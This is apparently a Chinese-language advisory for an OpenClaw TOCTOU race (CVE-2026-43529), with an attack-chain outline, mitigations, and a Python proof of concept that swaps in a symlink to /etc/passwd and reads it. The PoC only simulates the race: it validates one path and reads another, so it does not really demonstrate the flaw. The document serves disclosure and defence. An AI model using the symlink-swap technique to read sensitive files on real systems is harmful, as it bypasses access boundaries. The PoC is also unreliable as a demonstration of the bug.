CVE-2026-43529 OpenClaw TOCTOU竞争条件漏洞

漏洞信息

漏洞编号

CVE-2026-43529

漏洞类型

竞争条件 (TOCTOU)

CVSS评分

2.5 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.4.10之前的版本中存在一个安全漏洞，该漏洞被归类为时间-of-check-to-time-of-use（TOCTOU）竞争条件漏洞。漏洞位于`validateScriptFileForShellBleed`函数中，允许本地攻击者绕过工作区边界检查。攻击者需要拥有工作区的写入权限，利用验证和预检读取之间的时间差，通过竞争条件交换目标文件。这使得验证器检查的文件标识与通过初始边界检查的文件不一致，从而导致安全机制失效，可能泄露敏感信息或执行未授权操作。

技术细节

该漏洞的核心原理在于“检查与使用之间的时间差”。在`validateScriptFileForShellBleed`函数中，程序首先对脚本文件进行安全验证（检查文件路径、权限等边界条件），验证通过后，会在稍后的“预检读取”阶段再次读取该文件内容并执行或处理。由于这两个操作并非原子性的，中间存在一个时间窗口。攻击者如果拥有工作区的写入权限，可以在验证通过后、预检读取前的极短时间内，利用符号链接（symlink）或文件替换操作，将原本合法的文件替换为恶意文件或指向敏感文件的链接。这样，系统后续处理的就是攻击者指定的文件，从而绕过了初始的安全边界检查。这种攻击方式依赖于本地访问能力和精确的时机控制，虽然利用难度较高（AC:H），但在多线程或高并发环境下更易触发。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者获取目标系统的本地访问权限，并获得对OpenClaw工作区的写入权限（PR:L）。

STEP 2

步骤2：准备环境

攻击者在工作区内准备一个看似合法的脚本文件用于通过初始验证，并确定想要窃取的目标敏感文件路径。

STEP 3

步骤3：触发竞争条件

攻击者触发OpenClaw的脚本验证流程，在`validateScriptFileForShellBleed`函数完成文件检查但尚未进行预检读取的极短时间内，将合法文件替换为指向敏感文件的符号链接。

STEP 4

步骤4：绕过边界检查

预检读取阶段读取了攻击者替换后的文件内容，导致验证器检查的是合法文件，实际处理的却是敏感文件，从而绕过了工作区边界限制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import os
import time
import threading

# PoC for CVE-2026-43529: OpenClaw TOCTOU Race Condition
# This script simulates an attacker swapping a file after validation.

VALID_FILE = "./workspace/valid_script.sh"
TARGET_FILE = "/etc/passwd" # Sensitive file to leak
LINK_PATH = "./workspace/target_link"

def setup():
    if not os.path.exists("./workspace"):
        os.makedirs("./workspace")
    with open(VALID_FILE, "w") as f:
        f.write("#!/bin/bash\necho 'Safe script'")

def race_condition_swap():
    print("[*] Attempting to swap file...")
    # Simulate the window between check and use
    # In a real scenario, this loops rapidly until success
    while True:
        try:
            # The attacker removes the valid file and creates a symlink to the target
            if os.path.exists(LINK_PATH):
                os.remove(LINK_PATH)
            os.symlink(TARGET_FILE, LINK_PATH)
            print("[+] Symlink created to " + TARGET_FILE)
            break
        except Exception as e:
            pass

def trigger_vulnerable_function():
    # Simulating the vulnerable OpenClaw function behavior
    # 1. Check phase (validateScriptFileForShellBleed)
    # Assuming it checks if VALID_FILE is safe
    if os.path.exists(VALID_FILE):
        print("[*] Validation phase: File looks safe.")
        
        # 2. Attacker triggers swap here
        attacker_thread = threading.Thread(target=race_condition_swap)
        attacker_thread.start()
        
        # Small delay to simulate processing time allowing the race
        time.sleep(0.1) 
        
        # 3. Use phase (Preflight read)
        # The code reads from the path, which is now a symlink
        with open(LINK_PATH, "r") as f:
            content = f.read()
            print("[*] Use phase: Read content ->")
            print(content[:100]) # Print part of /etc/passwd
    else:
        print("[-] Setup failed.")

if __name__ == "__main__":
    setup()
    trigger_vulnerable_function()

影响范围

OpenClaw < 2026.4.10

防御指南

临时缓解措施

建议立即将OpenClaw升级至2026.4.10或更高版本。如果不能立即升级，应严格限制对工作区的写入权限，仅允许受信用户访问。此外，可以在系统层面监控文件系统的异常快速变化操作以检测潜在的竞争条件攻击。